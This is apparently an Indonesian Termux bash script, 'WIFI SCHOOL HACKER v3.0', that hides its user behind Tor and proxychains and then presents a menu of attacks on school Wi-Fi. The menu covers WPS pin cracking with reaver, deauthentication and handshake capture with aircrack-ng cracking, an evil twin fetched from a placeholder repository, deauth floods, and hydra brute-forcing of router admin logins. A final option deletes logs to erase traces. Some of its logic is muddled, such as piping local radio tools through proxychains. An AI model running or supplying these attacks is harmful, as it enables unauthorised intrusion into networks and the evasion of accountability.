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#!/data/data/com.termux/files/usr/bin/bash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Warna keren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RED='\033[1;31m'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GREEN='\033[1;32m'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YELLOW='\033[1;33m'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BLUE='\033[1;34m'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PURPLE='\033[1;35m'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CYAN='\033[1;36m'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WHITE='\033[1;37m'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NC='\033[0m'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🎭 VPN CHECK &amp; ACTIVATION - WAJIB DULUAN!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clear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"${PURPLE}"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"╔════════════════════════════════════════╗"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"║   NESIA DARKNET - VPN FIRST SYSTEM     ║"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"║    NO VPN = NO HACKING 😈              ║"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"╚════════════════════════════════════════╝${NC}"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""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vpn_activation()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"${YELLOW}[+] CHECKING VPN CONNECTION...${NC}"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Cek apakah TOR sudah terinstall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if ! command -v tor &amp;&gt; /dev/null; then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"${RED}[!] TOR belum terinstall!${NC}"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"${GREEN}[+] Installing TOR &amp; Proxy Chains...${NC}"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pkg install tor proxychains-ng -y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Start TOR service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"${YELLOW}[+] Starting TOR VPN Service...${NC}"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tor &amp;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sleep 5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Cek koneksi TOR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"${CYAN}[+] Testing VPN anonymity...${NC}"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vpn_check=$(curl --socks5-hostname localhost:9050 -s https://check.torproject.org | grep -o "Congratulations")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if [ "$vpn_check" = "Congratulations" ]; then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"${GREEN}[✓] VPN TOR AKTIF! IP Tersembunyi 😎${NC}"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"${BLUE}[+] IP Publik kamu sekarang:${NC}"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curl --socks5-hostname localhost:9050 -s https://api.ipify.org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""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"${GREEN}[+] VPN Protocol: SOCKS5 Port 9050${NC}"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"${GREEN}[+] Country: Hidden 🇺🇳${NC}"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return 0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else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"${RED}[✗] VPN GAGAL DIHIDUPKAN!${NC}"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"${YELLOW}[+] Mencoba metode alternatif...${NC}"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# Metode alternatif: Proxychains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-e "${CYAN}[+] Menggunakan ProxyChains...${NC}"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pkg install proxychains-ng -y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# Setup proxychains config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"socks5 127.0.0.1 9050" &gt; $PREFIX/etc/proxychains.conf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"socks5 127.0.0.1 9150" &gt;&gt; $PREFIX/etc/proxychains.conf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echo "http 127.0.0.1 8080" &gt;&gt; $PREFIX/etc/proxychains.conf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# Test dengan proxychains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if proxychains curl -s https://api.ipify.org &amp;&gt; /dev/null; then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"${GREEN}[✓] PROXYCHAINS AKTIF!${NC}"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return 0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else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"${RED}[✗] SEMUA VPN GAGAL!${NC}"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"${YELLOW}[+] Tool akan mati dalam 5 detik...${NC}"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sleep 5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exit 1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fi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🛡️ ANONYMITY CHECK SETIAP 2 MENIT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anonymity_monitor()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while true; do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sleep 120  # Cek setiap 2 menit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vpn_check=$(curl --socks5-hostname localhost:9050 -s https://check.torproject.org | grep -o "Congratulations")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if [ "$vpn_check" != "Congratulations" ]; then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"${RED}[⚠] VPN TERDETEKSI MATI!${NC}"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"${YELLOW}[+] Restarting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pkill tor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tor &amp;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sleep 3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# Jika masih gagal, warning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vpn_check=$(curl --socks5-hostname localhost:9050 -s https://check.torproject.org | grep -o "Congratulations")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if [ "$vpn_check" != "Congratulations" ]; then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echo -e "${RED}[‼] VPN TIDAK BISA DIPULIHKAN!${NC}"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echo -e "${RED}[‼] TOOL AKAN DIMATIKAN OTOMATIS!${NC}"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pkill -f "wifi_school_vpn.sh"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exit 1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fi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fi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done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🚀 EKSEKUSI VPN DULU!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"${RED}[‼] PERINGATAN:${NC}"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"${YELLOW}[+] Tool ini ILLEGAL tanpa VPN!${NC}"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"${CYAN}[+] VPN akan diaktifkan otomatis...${NC}"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""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Jalankan VPN check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vpn_activation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Jalankan monitor VPN di background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anonymity_monitor &amp;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🖥️ MAIN HACKING TOOL SETELAH VPN AKTIF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============================================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clear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"${GREEN}"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"╔════════════════════════════════════════╗"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"║   WIFI SCHOOL HACKER v3.0             ║"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"║   VPN STATUS: ✅ AKTIF                 ║"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"║   ANONYMITY: 100% TERJAGA 😎          ║"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"╚════════════════════════════════════════╝${NC}"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"${PURPLE}[+] All traffic melalui TOR Network!${NC}"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"${PURPLE}[+] ISP tidak bisa lacak aktivitas!${NC}"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""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Function jalankan dengan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run_with_vpn()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proxychains "$@"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Install tools via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echo -e "${YELLOW}[+] Installing tools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run_with_vpn pkg update -y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run_with_vpn pkg install -y aircrack-ng hydra macchanger reaver bully wireshark tcpdump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Main hacking function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start_hacking()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"${RED}[+] WIFI HACKING MODE AKTIF!${NC}"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Enable monitor mode via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run_with_vpn airmon-ng check kill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run_with_vpn airmon-ng start wlan0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Scan WiFi dengan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"${CYAN}[+] Scanning WiFi networks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run_with_vpn airodump-ng wlan0mon --output-format csv -w vpn_scan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"${GREEN}[+] SCAN BERHASIL!${NC}"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""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# Tampilkan menu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"${BLUE}╔══════════════════════════════════╗${NC}"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        ATTACK METHODS      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"${BLUE}╠══════════════════════════════════╣${NC}"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1. WPS Pin Attack (via VPN)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2. Handshake Capture (via VPN)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3. Evil Twin (via VPN)     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4. Deauth Attack (via VPN) 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5. Router Admin Brute (via VPN)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6. Check VPN Status        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"${BLUE}║ 7. Exit &amp; Clean Logs            ║${NC}"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-e "${BLUE}╚══════════════════════════════════╝${NC}"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""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read -p "Pilih attack [1-7]: " attack_choice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case $attack_choice in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1)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"${RED}[+] Starting WPS Attack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read -p "Masukkan BSSID target: " target_bssid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reaver -i wlan0mon -b $target_bssid -vv -K 1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2)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"${RED}[+] Capturing Handshake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read -p "Masukkan BSSID target: " target_bssid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read -p "Masukkan Channel: " target_channel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# Deauth via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aireplay-ng -0 10 -a $target_bssid wlan0mon &amp;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# Capture via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airodump-ng -c $target_channel --bssid $target_bssid -w vpn_handshake wlan0mon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# Bruteforce via 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"${YELLOW}[+] Downloading wordlist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wget https://github.com/example/school-passwords/raw/main/list.txt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aircrack-ng -w list.txt -b $target_bssid vpn_handshake-01.cap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3)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"${RED}[+] Evil Twin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git clone https://github.com/example/evil-twin-vpn.git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cd evil-twin-vpn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python3 evil_twin.py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4)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"${RED}[+] Deauth Attack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read -p "Masukkan BSSID target: " target_bssid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aireplay-ng -0 100 -a $target_bssid wlan0mon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5)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"${RED}[+] Router Admin Brute via VPN...${NC}"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"${YELLOW}[+] Common school router IPs:${NC}"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"192.168.1.1"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"192.168.0.1"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"10.0.0.1"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read -p "Masukkan router IP: " router_ip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hydra -l admin -P list.txt $router_ip http-post-form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6)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"${GREEN}[+] VPN STATUS CHECK${NC}"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curl https://check.torproject.org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7)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"${YELLOW}[+] Cleaning semua logs...${NC}"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rm -f *.cap *.csv *.txt *.log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run_with_vpn airmon-ng stop wlan0mon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"${GREEN}[+] Semua jejak dihapus!${NC}"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pkill tor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exit 0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*)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echo -e "${RED}[!] Pilihan salah!${NC}"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;;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esac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 Loop utama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while true; do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start_hacking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echo ""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read -p "Tekan Enter untuk kembali ke menu..."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clear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done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